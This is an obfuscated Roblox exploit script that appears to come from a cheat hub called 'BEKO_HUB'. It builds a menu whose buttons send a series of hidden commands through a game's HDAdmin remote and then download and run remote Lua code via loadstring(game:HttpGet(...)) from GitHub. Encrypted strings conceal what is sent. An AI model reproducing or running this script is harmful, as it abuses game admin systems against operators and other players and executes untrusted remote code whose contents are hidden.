v24=v14:MakeTab({[v7("\167\29\239\132","\233\124\130\225\218\119")]=v7("\92\123\219\131\135\96\48","\31\41\158\199\206\52\99\109"),[v7("\158\222\195\234","\215\189\172\132\182\213\22\81")]="rbxassetid://4483345998",[v7("\136\97\73\222\51\190\67\151\125\64\202","\216\19\44\179\90\203\46")]=false});v24:AddParagraph(v7("\11\93\40\175\79\176\83\104\91\34","\72\47\77\203\38\196\32"),v7("\6\85\105\74\125\236\16\127\17","\77\39\16\57\94\218\41"));v24:AddButton({[v7("\167\205\4\192","\233\172\105\165\114\21")]=v7("\32\122\102\198\254\99\109\48\118\121\205\154\7\119\38\103\96\218\140","\99\53\54\159\222\39\36"),[v7("\55\221\224\194\211\115\64\226","\116\188\140\174\177\18\35\137")]=function()setclipboard("https://discord.gg/EQQHWVQFz8");end});v24:AddButton({[v7("\210\248\127\67","\156\153\18\38")]=v7("\209\50\56\223\65\101\86\199\41\61\196\36\28\85\219\51\35","\146\125\104\134\97\60\25"),[v7("\175\125\66\199\142\125\77\192","\236\28\46\171")]=function()setclipboard("https://youtube.com/@BEKO_HUB");end});v24:AddButton({[v7("\172\209\169\137","\226\176\196\236\169\189\43")]=v7("\49\145\155\196\30\60\29\48\146\132\197\30\32\19\63\155","\114\222\203\157\62\110\82"),[v7("\168\119\1\79\244\68\71\128","\235\22\109\35\150\37\36")]=function()setclipboard(v7("\37\47\28\9\228\50\217\35","\71\74\119\102\187\95\182"));end});v18:AddButton({[v7("\105\212\125\47","\39\181\16\74\131\189\31")]=v7("\241\174\193\244\203\216\224\160\208\135","\161\235\149\212\152\150"),[v7("\225\210\65\69\243\195\208\70","\162\179\45\41\145")]=function()wait(0.2);local v93={[1 + 0]=v7("\2\238\160\152\62\212\22\175\92\163\171","\57\131\207\234\78\188\54\194")};game:GetService(v7("\65\54\49\11\255\84\114\39\36\3\197\67\124\33\32\0\243","\19\83\65\103\150\55")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait((1097.2 -(62 + 1035)) + 0);local v93={[3 -2]=v7("\238\115\161\137\73","\213\16\201\232\59\128\140\214")};game:GetService(v7("\104\92\89\194\195\89\88\93\203\206\105\77\70\220\203\93\92","\58\57\41\174\170")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(0.3 -0);local v93={[568 -(90 + 477)]=v7("\29\124\225\215\83\231\22\119\67\49\224\202\76\237\7","\38\17\142\165\35\143\54\26")};game:GetService(v7("\238\221\61\64\213\219\44\88\217\220\30\88\211\202\44\75\217","\188\184\77\44")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(1 + 0 + 0);local v93={[1 -0]=v7("\176\143\0\208\66\162\201\171\211\89\144\85\251\159\186\212","\139\231\97\164\98\207\172")};game:GetService(v7("\53\140\146\238\178\4\136\150\231\191\52\157\141\240\186\0\140","\103\233\226\130\219")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait((2 + 0) -(1 -0));local v93={[2 -1]=v7("\25\87\25\15\2\82\29\91\20\13\79\73\22\7\77\73","\34\63\120\123")};game:GetService(v7("\20\23\179\162\222\237\217\45\35\22\144\186\216\252\217\62\35","\70\114\195\206\183\142\184\89")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(1);local v93={[1]=v7("\111\39\212\206\116\34\208\154\96\122\132\136\102\127\141\142\109","\84\79\181\186")};game:GetService(v7("\2\204\46\217\57\202\63\193\53\205\13\193\63\219\63\210\53","\80\169\94\181")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(159 -(73 + 85));local v93={[160 -(6 + 153)]=v7("\91\249\133\107\134\65\1\64\162\211\41\147\30\83\81\160\209","\96\145\228\31\166\44\100")};game:GetService(v7("\70\38\4\78\125\32\21\86\113\39\39\86\123\49\21\69\113","\20\67\116\34")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(1 + 0);local v93={[(4 -2) -1]=v7("\26\27\224\62\1\30\228\106\18\71\177\115\23\66\179\124\23\67","\33\115\129\74")};game:GetService(v7("\36\136\8\65\6\124\46\2\136\28\126\27\112\61\23\138\29","\118\237\120\45\111\31\79")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(1);local v93={[1]=v7("\145\44\42\183\7\199\33\107\240\30\158\116\120\244\18\153\113\122","\170\68\75\195\39")};game:GetService(v7("\143\221\29\24\38\190\217\25\17\43\142\204\2\6\46\186\221","\221\184\109\116\79")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(1);local v93={[2 -1]=v7("\191\69\192\189\21\42\41\58\178\30\151\240\5\119\124\34","\132\45\161\201\53\71\76\26")};game:GetService(v7("\98\8\62\171\89\14\47\179\85\9\29\179\95\31\47\160\85","\48\109\78\199")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(1 + 0);local v93={[(2 -1) + 0]=v7("\68\212\2\153\95\209\6\205\73\142\81\222\75\136\81\216","\127\188\99\237")};game:GetService(v7("\154\76\55\48\36\125\169\93\34\56\30\106\167\91\38\59\40","\200\41\71\92\77\30")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait((1811 -(915 + 758)) -(26 + 109 + 2));local v93={[156 -(21 + 62 + 72)]=v7("\123\252\190\227\254\214\207\200\117\160\238\166\233\139\152\220\119\160","\64\148\223\151\222\187\170\232")};game:GetService(v7("\240\2\9\219\175\208\195\19\28\211\149\199\205\21\24\208\163","\162\103\121\183\198\179")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(1);local v93={[953 -(432 + 520)]=v7("\24\175\228\11\112\216\243\3\241\176\76\99\129\163\16\254\183\79","\35\199\133\127\80\181\150")};game:GetService(v7("\242\253\0\229\2\0\112\46\197\252\35\253\4\17\112\61\197","\160\152\112\137\107\99\17\90")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(1323 -(1038 + 276));loadstring(game:HttpGet("https://raw.githubusercontent.com/rouxhaver/scripts/main/FE pet Snakes.Lua",true))();end});v18:AddButton({[v7("\114\132\181\68","\60\229\216\33\51\41")]=v7("\10\218\91\239\146\215","\89\138\18\171\215\133"),[v7("\33\209\181\16\0\209\186\23","\98\176\217\124")]=function()wait(0.2);local v94={[1 + 0]=v7("\185\127\160\24\152\66\163\239\119\239\14","\130\18\207\106\232\42\131")};game:GetService(v7("\226\82\13\254\58\114\209\67\24\246\0\101\223\69\28\245\54","\176\55\125\146\83\17")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(0.3);local v94={[923 -(471 + (1187 -736))]=v7("\232\171\114\213\66\187\230\112\194\18\189\169\114\197\3","\211\198\29\167\50")};game:GetService(v7("\109\117\239\42\221\136\94\100\250\34\231\159\80\98\254\33\209","\63\16\159\70\180\235")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(0.4 -0);local v94={[1]=v7("\226\22\13\13\171","\217\117\101\108")};game:GetService(v7("\184\90\243\54\168\89\139\75\230\62\146\78\133\77\226\61\164","\234\63\131\90\193\58")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(1);local v94={[1]=v7("\235\221\133\229\199\210\43\240\129\212\165\208\138\123\228\140\209\168","\208\181\228\145\231\191\78")};game:GetService(v7("\210\115\171\244\83\61\60\0\229\114\136\236\85\44\60\19\229","\128\22\219\152\58\94\93\116")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(1 + (0 -0));local v94={[1]=v7("\64\231\90\14\91\226\94\90\79\183\15\77\79\188\10\73","\123\143\59\122")};game:GetService(v7("\35\246\31\171\24\240\14\179\20\247\60\179\30\225\14\160\20","\113\147\111\199")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait((52 + 1250) -(316 + 985));local v94={[(3 + 1) -3]=v7("\93\53\228\229\168\185\112\70\110\177\161\177\226\36\84\107\179\161","\102\93\133\145\136\212\21")};game:GetService(v7("\254\50\41\23\234\228\48\214\201\51\10\15\236\245\48\197\201","\172\87\89\123\131\135\81\162")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(1 + 0);local v94={[1376 -(1132 + 243)]=v7("\222\212\64\73\165\93\195\197\138\18\11\188\0\150\213\132","\229\188\33\61\133\48\166")};game:GetService(v7("\57\51\218\61\203\11\121\31\51\206\2\214\7\106\10\49\207","\107\86\170\81\162\104\24")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(501 -(115 + 385));local v94={[3 -2]=v7("\227\82\116\230\181\83\189\26\35\160\167\13\236\14\39\167","\216\58\21\146\149\62")};game:GetService(v7("\10\38\170\16\115\201\72\44\38\190\47\110\197\91\57\36\191","\88\67\218\124\26\170\41")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(1);local v94={[1 -(0 + 0)]=v7("\99\231\201\188\57\167\61\175\155\255\47\255\106\184\153\249\44","\88\143\168\200\25\202")};game:GetService(v7("\146\132\252\223\168\121\161\149\233\215\146\110\175\147\237\212\164","\192\225\140\179\193\26")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait((43 -(24 + 18)) + 0);local v94={[3 -2]=v7("\136\207\185\90\147\202\189\14\135\146\233\28\129\151\224\26\138","\179\167\216\46")};game:GetService(v7("\110\45\4\137\249\174\64\21\89\44\39\145\255\191\64\6\89","\60\72\116\229\144\205\33\97")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait((133 + 84) -((1559 -(1366 + 172)) + (528 -333)));local v94={[(1 + 0) -0]=v7("\226\251\195\76\231\180\246\130\14\245\238\161\150\0\242\235","\217\147\162\56\199")};game:GetService(v7("\200\246\108\78\27\249\242\104\71\22\201\231\115\80\19\253\246","\154\147\28\34\114")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(1);local v94={[1]=v7("\76\181\243\226\87\176\247\182\67\229\166\161\67\239\171\162","\119\221\146\150")};game:GetService(v7("\251\93\193\27\203\202\89\197\18\198\250\76\222\5\195\206\93","\169\56\177\119\162")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(1 -0);local v94={[1 + 0]=v7("\87\129\121\168\124\1\140\56\234\111\92\208\45\229\110\89\221\47","\108\233\24\220\92")};game:GetService(v7("\128\192\88\254\187\198\73\230\183\193\123\230\189\215\73\245\183","\210\165\40\146")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(1 + 12);loadstring(game:HttpGet("https://raw.githubusercontent.com/0Ben1/fe/main/Sipder",true))();end});v13:Init();end
